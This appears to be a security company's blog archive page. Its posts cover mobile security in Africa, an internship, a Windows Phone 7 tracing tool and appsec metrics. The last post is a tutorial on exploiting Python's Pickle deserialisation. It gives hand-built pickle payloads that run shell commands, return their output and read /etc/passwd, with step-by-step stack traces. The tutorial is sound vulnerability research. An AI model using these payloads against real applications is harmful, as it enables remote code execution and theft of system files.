Grey bar Blue bar
Share this:

Wed, 7 Mar 2012

Mobile Security - Observations from the developing world

By the year 2015 sub-Saharan Africa will have more people with mobile network access than with access to electricity at home.
This remarkable fact from a 2011 MobileMonday report [1] came to mind again as I read an article just yesterday about the introduction of Mobile Money in the UK: By the start of next year, every bank customer in the country may have the ability to transfer cash between bank accounts, using an app on their mobile phone. [2]

I originally came across the MobileMonday report while researching the question of mobility and security in Africa for a conference I was asked to present at [3]. In this presentation I examine the global growth and impact of the so-called mobile revolution and then its relevance to Africa, before looking at some of the potential security implications this revolution will have.

The bit about the mobile revolution is easy: According to the Economist there will be 10 billion mobile devices connected to the Internet by 2020, and the number of mobile devices will surpass the number of PCs and laptops by this year already. The mobile-only Internet population will grow 56-fold from 14 million at the end of 2010 to 788 million by the end of 2015. Consumerization - the trend for new information technology to emerge first in the consumer market and then spread into business organizations, resulting in the convergence of the IT and consumer electronics industries - implies that the end-user is defining the roadmap for these technologies as manufacturers, networks and businesses scramble desperately to absorb their impact.

Africa, languishing behind in so many other respects, is right there on the rushing face of this new wave, as my initial quote illustrates. In fact the kind of mobile payment technology referred to in the BBC article is already quite prevalent in our home markets in Africa and we're frequently engaged to test mobile application security in various forms. In my presentation for example, I make reference to m-Pesa - the mobile payments system launched in Kenya and now mimicked in South Africa also. Six million people in Kenya use m-Pesa, and more than 5% of that country's annual GDP is moved to and fro directly from mobile to mobile. There are nearly five times the number of m-Pesa outlets than the total number of PostBank branches, post offices, bank branches, and automated teller machines (ATMs) in the country combined.

Closer to home in South Africa, it is estimated that the number of people with mobile phones outstrips the number of people with fixed-line Internet connections by a factor of ten! And this impacts our clients and their businesses directly: Approximately 44% of urban cellphone users in South Africa now make use of mobile banking services. The reasoning is clear: Where fixed infrastructure is poor mobile will dominate, and where the mobile dominates mobile services will soon follow. Mobile banking, mobile wallets, mobile TV and mobile social networking and mobile strong-authentication systems are all already prevalent here in South Africa and are already bringing with them the expected new array of security challenges. Understanding this is one of the reasons our customers come to us.

In my presentation I describe the Mobile Threat Model as having three key facets:

  • Security: The challenge of ensuring Confidentiality, Integrity and Authenticity for the data and transactions on the device;
  • Privacy: The implications of mobility (and especially convergence) for citizens and their rights to talk, move, think and act unobserved; and
  • Control: The challenge presented by the mobile revolution to governments fighting crime, gangsterism and terrorism.
All of these issues are real and complex, but I'm restricting myself to the security question here. I encourage readers to peruse the presentation itself for a full breakdown of the Threat Model because for this article I think it suffices to consider just the conclusion of my presentation, and it's this:

The technical security issues we discover on mobile devices and mobile applications today are really no different from what we've been finding in other environments for years. There are some interesting new variations and interesting new attack vectors, but it's really just a new flavor of the same thing. But there are four attributes of the modern mobile landscape that combine to present us with an entirely new challenge:

Firstly, mobiles are highly connected. The mobile phone is permanently on some IP network and by extension permanently on the Internet. However, it's also connected via GSM and CDMA; it's connected with your PC via USB, your Bluetooth headset and your GPS, and soon it will be connected with other devices in your vicinity via NFC. Never before in our history have communications been so converged, and all via the wallet-sized device in your pocket right now!

Secondly, the mobile device is deeply integrated. On or through this platform is everything anyone would ever want to know about you: Your location, your phone calls, your messages, your personal data, your photos, your location, your location history and your entire social network. Indeed, in an increasing number of technical paradigms, your mobile device is you! Moreover, the device has the ability to collect, store and transmit everything you say, see and hear, and everywhere you go!

Thirdly, as I've pointed out, mobile devices are incredibly widely distributed. Basically, everyone has one or soon will. And, we're rapidly steering towards a homogenous environment defined by IOS and Google's Android. Imagine the effect this has on the value of an exploit or attack vector. Finally, the mobile landscape is still being very, very poorly managed. Except for the Apple AppStore, and recent advances by Google to manage the Android market, there is extremely little by way of standardization, automated patching or central management to be seen. Most devices, once deployed, will stay in commission for years to come and so security mistakes being made now are likely to become a nightmare for us in the future.

Thus, the technical issues well known from years of security testing in traditional environments are destined to prevail in mobile, and we're already seeing this in the environments we've tested. This reality, combined with how connected, integrated, distributed and poorly managed these platforms are, suggests that careless decisions today could cost us very dearly in the future...

[1] Mobile Africa Report 2011, Regional Hubs of Excellence and Innovation by Dr Madanmohan Rao, Research Project Director, MobileMonday March 2011

[2] http://www.bbc.co.uk/news/business-17115946

[3] http://prezi.com/as-szhrug5zr/examining-the-impact-of-the-adoption-of-mobile-devices-throughout-africa-and-the-subsequent-rise-of-security-related-risks-sensepost-information-security/

Wed, 21 Dec 2011

The first one...

My name is Kabelo Ramtse, a second year engineering student at the University Of Cape Town. Today is the last day of my internship which ran for four weeks during my December vacation at the Cape Town office.

Internships are a new idea at SensePost aimed at students and are intended to give them exposure to the information security industry. I am the first person to take part in the program.

My main responsibility was to chronologically order, summarize and upload past SensePost presentations. The presentations are available here. The presentations Setiri and Breaking the bank are two of my favorites. Reading through the presentations taught me alot about information security and made me even more keen to increase my knowledge in this field. Meeting the big boss and getting mini lectures from Marco was cool.

Tomorrow I fly home to Jo'burg to enjoy the rest of my vacation. Merry Christmas and happy new year!

Fri, 23 Sep 2011

Runtime analysis of Windows Phone 7 Applications

Runtime analysis is an integral part of most application security assessment processes. Many powerful tools have been developed to perform execution/data flow analysis and code debugging for desktop and server operating systems. Although a few dynamic analysis tools such as DroidBox are available for Android, I currently know of no similar public tools for the Windows Phone 7 platform. The main challenge for Windows Phone 7 is the lack of a programable debugging interface in both the Emulator and phone devices. The Visual Studio 2010 debugger for Phone applications does not have an "Attach to process" feature and can only be used to debug applications for which the source code is available. Although the Kernel Independent Transport Layer (KITL) can be enabled on some Windows Phone devices at boot time which could be very useful for Kernel and unmanged code debugging, it can't be used directly for code tracing of phone applications which are executed by the .NET compact framework.

The following figure demonstrates an overview of the process which I have used to record the execution and data flow of Windows Phone 7 applications without using a debugger:

The instrumented phone application prints out method names and variables to the emulator console (that can be enabled by adding a registry key) at runtime. The console window buffer is then captured by an API Hook (WriteFile API) in the emulator process and saved to the runtrace file. I have developed a tool named "XAP Spy" in C# to automate the above process. You will need Windows Phone 7 SDK, .NET freamworks 4.0 and 2.0 (The API hook code is based on EasyHook library which only works with .NET framework 2.0) to run this tool.

Runtime analysis demo of a WP7 software token

Download XAP Spy binaries

Download source code

Update (9/21/2011): XAP Spy binaries for Windows Phone SDK7.1 can be downloaded here.

Sun, 29 May 2011

Incorporating cost into appsec metrics for organisations

A longish post, but this wasn't going to fit into 140 characters. This is an argument pertaining to security metrics, with a statement that using pure vulnerability count-based metrics to talk about an organisation's application (in)security is insufficient, and suggests an alternative approach. Comments welcome.

Current metrics

Metrics and statistics are certainly interesting (none of those are infosec links). Within our industry, Verizon's Data Breach Investigations Report (DBIR) makes a splash each year, and Veracode are also receiving growing recognition for their State of Software Security (SOSS). Both are interesting to read and contain much insight. The DBIR specifically examines and records metrics for breaches, a post-hoc activity that only occurs once a series of vulnerabilities have been found and exploited by ruffians, while the SOSS provides insight into the opposing end of a system's life-cycle by automatically analysing applications before they are put into production (in a perfect world... no doubt they also examine apps that are already in production). Somewhat tangentially, Dr Geer wrote recently about a different metric for measuring the overall state of Cyber Security, we're currently at a 1021.6. Oh noes!

Apart from the two bookends (SOSS and DBIR), other metrics are also published.

From a testing perspective, WhiteHat releases perhaps the most well-known set of metrics for appsec bugs, and in years gone by, Corsaire released statistics covering their customers. Also in 2008, WASC undertook a project to provide metrics with data sourced from a number of companies, however this too has not seen recent activity (last edit on the site was over a year ago). WhiteHat's metrics measure the number of serious vulnerabilities in each site (High, Critical, Urgent) and then slice and dice this based on the vulnerability's classification, the organisation's size, and the vertical within which they lie. WhiteHat is also in the fairly unique position of being able to record remediation times with a higher granularity than appsec firms that engage with customers through projects rather than service contracts. Corsaire's approach was slightly different; they recorded metrics in terms of the classification of the vulnerability, its impact and the year within which the issue was found. Their report contained similar metrics to the WhiteHat report (e.g. % of apps with XSS), but the inclusion of data from multiple years permitted them to extract trends from their data. (No doubt WhiteHat have trending data, however in the last report it was absent). Lastly, WASC's approach is very similar to WhiteHat's, in that a point in time is selected and vulnerability counts according to impact and classification are provided for that point.

Essentially, each of these approaches uses a base metric of vulnerability tallies, which are then viewed from different angles (classification, time-series, impact). While the metrics are collected per-application, they are easily aggregated into organisations.

Drawback to current approaches

Problems with just counting bugs are well known. If I ask you to rate two organisations, the Ostrogoths and the Visigoths, on their effectiveness in developing secure applications, and I tell you that the Ostrogoths have 20 critical vulnerabilities across their applications, while the Visigoths only have 5, without further data it seems that the Visigoths have the lead. However, if we introduce the fact that the Visigoths have a single application in which all 5 issues appear, while the Ostrogoths spread their 20 bugs across 10 applications, then it's not so easy to crow for the Visigoths, who average 5 bugs per application as oppossed to the Ostrogoth's 2. Most reports take this into account, and report on a percentage of applications that exhibit a particular vulnerability (also seen as the probability that a randomly selected application will exhibit that issue). Unfortunately, even taking into account the number of applications is not sufficient; an organisation with 2 brochure-ware sites does not face the same risk as an organisation with 2 transaction-supporting financial applications, and this is where appsec metrics start to fray.

In the extreme edges of ideal metrics, the ability to factor in chains of vulnerabilities that individually present little risk, but combined is greater than the sum of the parts, would be fantastic. This aspect is ignored by most (including us), as a fruitful path isn't clear.

Why count in the first place?

Let's take a step back, and consider why we produce metrics; with the amount of data floating around, it's quite easy to extract information and publish, thereby earning a few PR points. However, are the metrics meaningful? The quick test is to ask whether they support decision making. For example, does it matter that external attackers were present in an overwhelming number incidents recorded in the DBIR? I suspect that this is an easy "yes", since this metric justifies shifting priorities to extend perimeter controls rather than rolling out NAC.

One could just as easily claim that absolute bug counts are irrelevant and that they need to be relative to some other scale; commonly the number of applications an organisation has. However in this case, if the metrics don't provide enough granularity to accurately position your organisation with respect to others that you actually care about, then they're worthless to you in decision making. What drives many of our customers is not where they stand in relation to every other organisation, but specifically their peers and competitors. It's slightly ironic that oftentimes the more metrics released, the less applicable they are to individual companies. As a bank, knowing you're in the top 10% of a sample of banking organisations means something; when you're in the highest 10% of a survey that includes WebGoat clones, the results are much less clear.

In Seven Myths About Information Security Metrics, Dr Hinson raises a number of interesting points about security metrics. They're mostly applicable to security awareness, however they also carry across into other security activities. At least two serve my selfish needs, so I'll quote them here:

Myth 1: Metrics must be “objective” and “tangible”

There is a subtle but important distinction between measuring subjective factors and measuring subjectively. It is relatively easy to measure “tangible” or objective things (the number of virus incidents, or the number of people trained). This normally gives a huge bias towards such metrics in most measurement systems, and a bias against measuring intangible things (such as level of security awareness). In fact, “intangible” or subjective things can be measured objectively, but we need to be reasonably smart about it (e.g., by using interviews,surveys and audits). Given the intangible nature of security awareness, it is definitely worth putting effort into the measurement of subjective factors, rather than relying entirely on easy-to-measure but largely irrelevant objective factors. [G Hinson]

and

Myth 3: We need absolute measurements

For some unfathomable reason, people often assume we need “absolute measures”—height in meters, weight in pounds, etc. This is nonsense!
If I line up the people in your department against a wall, I can easily tell who is tallest, with no rulers in sight. This yet again leads to an unnecessary bias in many measurement systems. In fact, relative values are often more useful than absolute scales, especially to drive improvement. Consider this for instance: “Tell me, on an (arbitrary) scale from one to ten, how security aware are the people in your department are? OK, I'll be back next month to ask you the same question!” We need not define the scale formally, as long as the person being asked (a) has his own mental model of the processes and (b) appreciates the need to improve them. We needn't even worry about minor variations in the scoring scale from month to month, as long as our objective of promoting improvement is met. Benchmarking and best practice transfer are good examples of this kind of thinking. “I don't expect us to be perfect, but I'd like us to be at least as good as standard X or company Y. [G Hinson]

While he writes from the view of an organisation trying to decide whether their security awareness program is yielding dividends, the core statements are applicable for organisations seeking to determine the efficacy of their software security program. I'm particularly drawn by two points: the first is that intangibles are as useful as concrete metrics, and the second is that absolute measurements aren't necessary, comparative ordering is sometimes enough.

Considering cost

It seems that one of the intangibles that currently published appsec metrics don't take into account, is cost to the attacker. No doubt behind each vulnerability's single impact rating are a multitude of factors that contribute, one of which may be something like "Complexity" or "Ease of Exploitation". However, measuring effort in this way is qualitative and only used as a component in the final rating. I'm suggesting that cost (interchangeable with effort) be incorporated into the base metric used when slicing datasets into views. This will allow you to understand the determination an attacker would require when facing one of your applications. Penetration testing companies are in a unique position to provide this estimate; a tester unleashed on an application project is time-bounded and throws their experience and knowledge at the app. At the end, one can start to estimate how much effort was required to produce the findings and, over time, gauge whether your testers are increasing their effort to find issues (stated differently, do they find fewer bugs in the same amount of time?). If these metrics don't move in the right direction, then one might conclude that your security practices are also not improving (providing material for decision making).

Measuring effort, or attacker cost, is not new to security but it's mostly done indirectly through the sale of exploits (e.g. iDefence, ZDI). Even here, effort is not directly related to the purchase price, which is also influenced by other factors such as the number of deployed targets etc. In any case, for custom applications that testers are mostly presented with, such public sources should be of little help (if your testers are submitting findings to ZDI, you have bigger problems). Every now and then, an exploit dev team will mention how long it took them to write an exploit for some weird Windows bug; these are always interesting data points, but are not specific enough for customers and the sample size is low.

Ideally, any measure of an attacker's cost can take into account both time and their exclusivity (or experience), however in practice this will be tough to gather from your testers. One could base it on their hourly rate, if your testing company differentiates between resources. In cases where they don't, or you're seeking to keep the metric simple, then another estimate for effort is the number of days spent on testing.

Returning to our sample companies, if the 5 vulnerabilities exposed in the Visigoth's each required, on average, a single day to find, while the Ostrogoth's 20 bugs average 5 days each, then the effort required by an attacker is minimised by choosing to target the Visigoths. In other words, one might argue that the Visigoths are more at risk than the Ostrogoths.

Metricload, take 1

In our first stab at incorporating effort, we selected an estimator of findings-per-day (or finding rate) to be the base metric against which the impact, classification, time-series and vertical attributes would be measured. From this, it's apparent that, subject to some minimum, the number of assessments performed is less important than the number of days worked. I don't yet have a way to answer what the minimum number of assessments should be, but it's clear that comparing two organisations where one has engaged with us 17 times and the other once, won't yield reliable results.

With this base metric, it's then possible to capture historical assessment data and provide both internal-looking metrics for an organisation as well as comparative metrics, if the testing company is also employed by your competitors. Internal metrics are the usual kinds (impact, classification, time-series), but the comparison option is very interesting. We're in the fortunate position of working with many top companies locally, and are able to compare competitors using this metric as a base. The actual ranking formulae is largely unimportant here. Naturally, data must be anonymised so as to protect names; one could provide the customer with their rank only. In this way, the customer has an independent notion of how their security activities rate against their peers without embarrassing the peers.

Inverting the findings-per-day metric provide the average number of days to find a particular class of vulnerability, or impact level. That is, if a client averages 0.7 High or Critical findings per testing day, then on average it takes us 1.4 days of testing to find an issue of great concern, which is an easy way of expressing the base metric.

What, me worry?

Without doubt, the findings-per-day estimator has drawbacks. For one, it doesn't take into consideration the tester's skill level (but this is also true of all appsec metrics published). This could be extended to include things like hourly rates, which indirectly measure skill. Also, the metric does not take into account functionality exposed by the site; if an organisation has only brochure-ware sites then it's unfair to compare them against transactional sites; this is mitigated at the time of analysis by comparing against peers rather than the entire sample group and also, to a degree, in the scoping of the project as a brochure-ware site would receive minimum testing time if scoped correctly.

As mentioned above, a minimum number of assessments would be needed before the metric is reliable; this is a hint at the deeper problems that randomly selected project days are not independent. An analyst stuck on a 4 week project is focused on a very small part of the broader organisation's application landscape. We counter this bias by including as many projects of the same type as possible.

Thought.rand()

If you can tease it out of them, finding rates could be an interesting method of comparing competing testing companies; ask "when testing companies of our size and vertical, what is your finding rate?", though there'd be little way to verify any claims. Can you foresee a day when testing companies advertise using their finding rate as the primary message? Perhaps...

This metric would also be very useful to include in each subsequent report for the customer, with every report containing an evaluation against their longterm vulnerability averages.

Field testing

Using the above findings-per-day metric as a base, we performed an historical analysis for a client on work performed over a number of years, with a focus on answering the following questions for them:
  1. On average, how long does it take to find issues at each Impact level (Critical down to Informational)?
  2. What are the trends for the various vulnerability classes? Does it take more or less time to find them year-on-year?
  3. What are the Top 10 issues they're currently facing?
  4. Where do they stand in relation to anonymised competitor data?
In preparation for the exercise, we had to capture a decent number of past reports, which was most time-consuming. What this highlighted for us was how paper-based reports and reporting is a serious hinderance to extracting useful data, and has provided impetus internally for us to look into alternatives. The derived statistics were presented to the client in a workshop, with representatives from a number of the customer's teams present. We had little insight into the background to many of the projects, and it was very interesting to hear the analysis and opinions that emerged as they digested the information. For example, one set of applications exhibited particularly poor metrics from a security standpoint. Someone highlighted the fact that these were outsourced applications, which raised a discussion within the client about the pros and cons on using third party developers. It also suggests that many further attributes can be attached to the data that is captured: internal or third party, development lifecycle model (is agile producing better code for you than other models?), team size, platforms, languages, frameworks etc.

As mentioned above, a key test for metrics is where they support decision making, and the feedback from the client was positive in this regard.

And now?

In summary, current security metrics as they relate to talking about an organisation's application security suffers from a resolution problem; they're not clear enough. Attacker effort is not modeled when discussing vulnerabilities, even though it's a significant factor when trying to get a handle on the ever slippery notion of risk. One approximation for attacker effort is to create a base-metric of the number of findings-per-day for a broad set of applications belonging to an organisation, and use those to evaluate which kinds of vulnerabilities are typically present while at the same time clarifying how much effort an attacker requires in order to exploit it.

This idea is still being fleshed out. If you're aware of previous work in this regard or have suggestions on how to improve it (even abandon it) please get in contact.

Oh, and if you've read this far and are looking for training, we're at BH in August.

Mon, 15 Nov 2010

Playing with Python Pickle #2

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python's Pickle mechanism for serializing and deserializing data and provided a bit of background regarding where we came across serialized data, how the virtual machine works and noted that Python intentionally does not perform security checks when unpickling.

In this post, we'll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we're going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we'll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It's actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V'<string>'\n -> Push Unicode <string> object onto the stack.
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the object (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated is an argument and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you're pasting the examples below into larger Pickle streams, make sure to remove the '.'
Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed: cos system (S'echo hello world' tR.

Let's step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. 'c' -> find the callable "os.system", push the callable onto the stack. [SB] [os.system]
  2. '(' -> push a MARK onto the stack [SB] [os.system] [MARK]
  3. "S'echo hello world'" -> push 'echo hello world' onto the stack [SB] [os.system] [MARK] ['echo hello world']
  4. 't' -> pop "echo hello world" and MARK, push the tuple "('echo hello world')" onto the stack [SB] [os.system] [('echo hello world')]
  5. 'R' -> pop "('echo hello world')" and "os.system", call os.system('echo hello world'), push the result back on the stack [SB] [0]
  6. '.' -> pop the result off the stack and terminate [SB], result was '0'
<rat-hole>

Perhaps one instruction that should be clarified is 'c', which loads a class based on the two arguments 'module' and 'class'. Pickle's docs define the behaviour as follows: "The class object module.class is pushed on the stack. More accurately, the object returned by self.find_class(module, class) is pushed on the stack". Our previous simplified definition said that the 'c' instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the 'R' instruction. A callable is an object that has a "__call__" attribute which, if you're also not a Python programmer, means having to search for more information. An non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for 'c'. However, class instance method objects (x=Foo();x.bar()) are not suitable for the 'c' opcode since it cannot handle class instances. Also worth pointing out that the 'R' opcode doesn't care about what type of object it executes, so long as the object responds to "__call__". The interplay between 'c' and 'R' is important for the approach shown later, since 'c' is quite limited but 'R' can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.

</rat-hole>

Let's try improve on the command execution example; it's cute for executing commands, but if the unpickling happens on an app server then we won't see the output of "os.system()" since it returns the retval of the shell rather than stdout/stderr. Any output of the command is printed to the server's stdout. Thus for our 'echo hello world' example, the unpickling returns '0' even though the command successfully ran.

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell's return value to carry over output:

cos system (S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;' tR.

This uses a combination of the shell's backtick and printf statements, sed and exit to return one character at a time in the exit status. However this too is messy; if the output changes between invocations this approach is pretty worthless and it's also noisy and low bandwidth.

The next option was "os.popen", however we quickly became bogged down. "os.popen()" returns an instance (e.g. proc=os.popen("echo foo")) and in order to access the output of the command, we'd need to call "proc.read()". However, the pickle instruction set doesn't appear to support calling instance methods directly as we've already mentioned. The next option was to look for other modules, and the 'subprocess' module did the trick with it's 'check_output()' function, which takes an executable and a set of arguments, runs the executable on the arguments and returns the contents as a string:

csubprocess check_output (S'uname' tR.

returns

'Darwin\n'

This looks like good news in that we're executing commands and viewing output, however the downsides quickly become apparent. "subprocess.check_output" does not invoke a shell, so we can't simply pass in "uname -a" as a single string, it needs to be broken up into arguments. More importantly though, "check_output" was only added in Python 2.7, so with earlier versions this won't work. We can easily overcome the first of these hurdles; "check_output" will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess check_output ((S'uname' S'-a' ltR. This is identical to the previous example except for the additional MARK instruction '(', the '-a' string argument and the 'l' instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. 'c' -> find the callable "subprocess.check_output", push the callable onto the stack. [SB] [subprocess.check_output]
  2. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK]
  3. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK] [MARK]
  4. "S'uname'" -> push 'uname' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. "S'-a'" -> push '-a' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. 'l' -> pop "uname", "-a" and MARK, push the list "['uname','-a']" onto the stack [SB] [subprocess.check_output] [MARK] [['uname','-a']]
  7. 't' -> pop "['uname','-a']" and MARK, push the tuple "(['uname','-a'])" onto the stack [SB] [subprocess.check_output] [(['uname','-a'])]
  8. 'R' -> pop "(['uname','-a'])" and "subprocess.check_output()", call subprocess.check_output((['uname','-a'])), push the result back on the stack [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. '.' -> pop the result off the stack and terminate [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'
The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling "string.strip()" on the output:

cstring strip (csubprocess check_output ((S'uname' S'-a' ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.

If the "check_output" method is relied upon, then we're still stuck with Python 2.7. Ideally we'd like to run "p=os.popen('ls -al');p.read()", however since the 'c' instruction required modules and classes, and could not handle class instances, it was not possible to perform this directly. It bears repetition though that the 'R' instruction could handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python's introspection support:

  • __builtin__.getattr(foo, "attribute") returns foo.attr. e.g. __builtin__.getattr(file, "read") -> file.read
  • __builtin__.apply(func, [args]) executes func([args])
Using the introspection tricks and without calling methods on class instances explicitly, we can execute "p=os.popen('ls -al'); p.read()" with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])

Converted into Pickle, this becomes:

cos popen (S'ls -al' tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

That's quite a mouthful, here's the breakdown:

  1. 'c' -> find the callable "os.popen", push it onto the stack [SB] [os.popen]
  2. '(' -> push a MARK onto the stack [SB] [os.popen] [MARK]
  3. "S'ls -al'" -> push 'ls -al' onto the stack [SB] [os.popen] [MARK] ['ls -al']
  4. 't' -> pop 'ls -al' and MARK, push ('ls -al') [SB] [os.popen] [('ls -al')]
  5. 'R' -> pop "os.popen" and "('ls -al')", call os.popen('ls -al'), push the opened file object onto the stack [SB] [<open file>]
  6. 'p0' -> store "<open file>" in register 0 [SB] [<open file>]
  7. '0' -> pop and discard topmost stack item [SB]
  8. 'c' -> find the callable '__builtin__.getattr', push it onto the stack [SB] [__builtin__.getattr]
  9. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  10. 'c' -> find the callable '__builtin__.file', push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. "S'read'" -> push 'read' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. 't' -> pop 'read', "__builtin__.file" and MARK, push (__builtin__.file, 'read') [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. 'R' -> pop "__builtin__.getattr" and "(__builtin__.file, 'read')", call __builtin__.getattr(__builtin__.file, 'read'), push the returned object onto the stack [SB] [<method object for 'file.read'>]
  14. 'p1' -> store "<method object for 'file.read'>" in register 1 [SB] [<method object for 'file.read'>]
  15. '0' -> pop and discard topmost stack item [SB]
  16. 'c' -> find the callable '__builtin__.apply', push it onto the stack [SB] [__builtin__.apply]
  17. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  18. 'g1' -> retrive contents of register 1, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>]
  19. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK]
  20. 'g0' -> retrive contents of register 0, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK] [<open file>]
  21. 'l' -> pop "<open file>" and MARK, push the list "[<open file>]" [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [[<open file>]]
  22. 't' -> pop '<method object for '<file.read'>', "[<open file>]" and MARK, push the tuple "(<file.read'>, '[<open file>])" [SB] [__builtin__.apply] [(<method object for 'file.read'>,[<open file>])]
  23. 'R' -> pop "__builtin__.apply" and "(<method object for 'file.read'>,[<open file>])", call __builtin__.apply(<method object for 'file.read'>,[<open file>]), push the returned object onto the stack [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. '.' -> pop the result off the stack and terminate [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"
This is really useful, since we can now return command output in any Python version that supports Pickle.

That's enough Pickle for today, I'll leave you with a final modification of the above pickle string, that reads and returns the contents of files:

c__builtin__ file (S"/etc/passwd" tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.